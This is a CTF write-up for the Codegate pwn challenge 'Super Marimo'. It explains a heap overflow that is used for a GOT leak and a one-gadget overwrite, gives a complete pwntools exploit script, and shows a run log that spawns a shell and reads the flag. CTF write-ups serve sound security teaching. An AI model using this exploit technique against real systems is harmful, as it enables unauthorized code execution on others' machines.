Rating:

## === Super Marimo (Pwn: 61 solves / 375 pts) ===

1. Create two marimos with the "show me the marimo" command (the script names them "1" and "2").
2. The profile write reached through [V]iew → [M]odify overflows the marimo's profile buffer into the adjacent heap chunk (the payload is 0x28 bytes of filler, a forged 0x21 chunk size field, then the next marimo's fields).
3. Overwrite the next marimo's name pointer with the address of puts()'s GOT entry and view that marimo: its "name" is now the runtime address of puts(), which gives the libc base.
4. The same marimo's profile pointer also points at the GOT entry, so modifying its profile overwrites puts()'s GOT slot with a one-gadget address. The binary is Partial RELRO (GOT writable, see the checksec output below), and the next call to puts() then lands in the one-gadget and spawns a shell.
5. The remote libc is not provided, but it can be identified from the leaked puts() address (the low 12 bits are a per-build fingerprint) using the libc database below; the hard-coded puts/one-gadget offsets in the script come from that lookup.
https://libc.blukat.me/

```
from pwn import *

#context(os='linux', arch='amd64')
#context.log_level = 'debug'

BINARY = './marimo'
elf = ELF(BINARY)

# GOT slot of puts() in the (non-PIE) binary: read once for the libc leak,
# later overwritten with the one-gadget address.
puts_got_addr = elf.got['puts']

# "r" as the first argument targets the remote service; anything else runs
# the binary locally against the system libc.
use_remote = len(sys.argv) > 1 and sys.argv[1] == 'r'
if not use_remote:
    s = process(BINARY)
    libc = elf.libc
    puts_offset_addr = libc.symbols['puts']
    # one_gadget offset for the local libc build; regenerate if libc changes.
    one_gadget_offset = 0x41bce
else:
    s = remote("ch41l3ng3s.codegate.kr", 3333)
    # Offsets for the remote libc build (identified from the leaked puts()
    # address, see the writeup above); both must match the same build.
    puts_offset_addr = 0x06f690
    one_gadget_offset = 0x45216

def Show(name, profile):
    """Create a marimo by walking the "show me the marimo" flow.

    Sends the create command, then `name`, then `profile`, each after waiting
    for the ">> " prompt on the global tube `s`.
    """
    for answer in ("show me the marimo", name, profile):
        s.recvuntil(">> ")
        s.sendline(answer)

def View_Modify(num, profile):
    """[V]iew marimo `num`, [M]odify its profile with `profile`, then go [B]ack.

    Every answer is sent after a ">> " prompt, including the final "B", so
    this helper expects the target to print a prompt again after the write.
    Do not use it for a write that hijacks control flow (the GOT overwrite at
    the end of the script is sent by hand for that reason).
    """
    dialogue = ["V", str(num), "M", profile, "B"]
    for answer in dialogue:
        s.recvuntil(">> ")
        s.sendline(answer)

def View(num):
    """Open the [V]iew screen for marimo `num`; the caller parses what is printed."""
    for answer in ("V", str(num)):
        s.recvuntil(">> ")
        s.sendline(answer)

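def Buy(num, play):
    """Open the [B]uy menu for marimo `num`, pause, then send the `play` answer.

    Not called by the exploit flow in this script. The pause before the last
    answer blocks until Enter is pressed on the terminal so the target can be
    inspected (e.g. attached in a debugger) before the final input is sent.
    """
    s.recvuntil(">> ")
    s.sendline("B")
    s.recvuntil(">> ")
    s.sendline(str(num))
    s.recvuntil(">> ")
    # Plain line read for the pause: Python 2's input() would eval() whatever
    # is typed, and it does not behave the same on Python 3.
    sys.stdin.readline()
    s.sendline(play)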

def Sell(num, sell):
    """Open the [S]ell menu for marimo `num` and answer the sell/run-away prompt.

    The last prompt differs from the generic ">> " one, so each step carries
    the exact text to wait for before answering.
    """
    exchange = [
        (">> ", "S"),
        (">> ", str(num)),
        ("[S]ell / [R]un away ?", sell),
    ]
    for prompt, answer in exchange:
        s.recvuntil(prompt)
        s.sendline(answer)

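# Two marimos: the payload below assumes marimo 0's profile buffer is
# immediately followed by marimo 1's chunk on the heap.
Show("1", "1")
Show("2", "2")

# The profile write appears to depend on elapsed time (the marimo "grows");
# without this wait the overflow did not reach the next chunk -- confirm
# against the binary if it stops working.
sleep(5)

# Overflow from marimo 0's profile into marimo 1's chunk:
#   0x28 bytes of filler  -> reach the neighbouring chunk header,
#   0x21                  -> forged size field (0x20 chunk, PREV_INUSE) so the heap stays sane,
#   0x15a765161           -> presumably marimo 1's first struct field -- TODO confirm,
#   puts@GOT twice        -> marimo 1's name and profile pointers, both redirected to the GOT slot.
buf = "3" * 0x28 + p64(0x21) + p64(0x15a765161)
buf += p64(puts_got_addr) + p64(puts_got_addr)
View_Modify(0, buf)

# Viewing marimo 1 now prints the contents of puts@GOT as its name: a libc leak.
View(1)
s.recvuntil("name : ")
# recvn() blocks for exactly 6 bytes; recv(6) may return short on a slow link
# and would silently produce a garbage address.
leak = s.recvn(6)
puts_addr = u64(leak.ljust(8, '\x00'))
libc_base_addr = puts_addr - puts_offset_addr
one_gadget_addr = libc_base_addr + one_gadget_offset

# Sanity check before corrupting the GOT: with the right puts() offset the
# base is page-aligned.  A misaligned base means the wrong libc/offset pair,
# and the one-gadget write would only crash the target.
if libc_base_addr & 0xfff:
    raise RuntimeError("libc base %#x is not page-aligned; wrong puts() offset?" % libc_base_addr)

print("puts_addr = %s" % hex(puts_addr))
print("libc_base_addr = %s" % hex(libc_base_addr))
print("one_gadget_addr = %s" % hex(one_gadget_addr))

# Leave the view of marimo 1 ("B"ack), then modify marimo 1's profile: its
# profile pointer is puts@GOT, so the write lands on the GOT entry.  This is
# spelled out instead of calling View_Modify() because once puts@GOT is
# overwritten the next puts() call (presumably the menu prompt) jumps to the
# one-gadget, so there is no further ">> " prompt to wait for.
s.recvuntil(">> ")
s.sendline("B")

s.recvuntil(">> ")
s.sendline("V")
s.recvuntil(">> ")
s.sendline("1")
s.recvuntil(">> ")
s.sendline("M")
s.recvuntil(">> ")
# NOTE(review): sendline appends "\n"; if the binary copies the whole line
# into the profile, that byte lands in the GOT slot after puts -- harmless
# here (the shell pops first), but worth knowing if the target changes.
s.sendline(p64(one_gadget_addr))

s.interactive()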
```

```
root@kali:~/Pwn_Super_Marimo# python exploit.py r
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Opening connection to ch41l3ng3s.codegate.kr on port 3333: Done
puts_addr = 0x7fb3ef02d690
libc_base_addr = 0x7fb3eefbe000
one_gadget_addr = 0x7fb3ef003216
[*] Switching to interactive mode
$ id
uid=1000(marimo) gid=1000(marimo) groups=1000(marimo)
$ ls
flag
marimo
$ cat flag
But_every_cat_is_more_cute_than_Marimo
```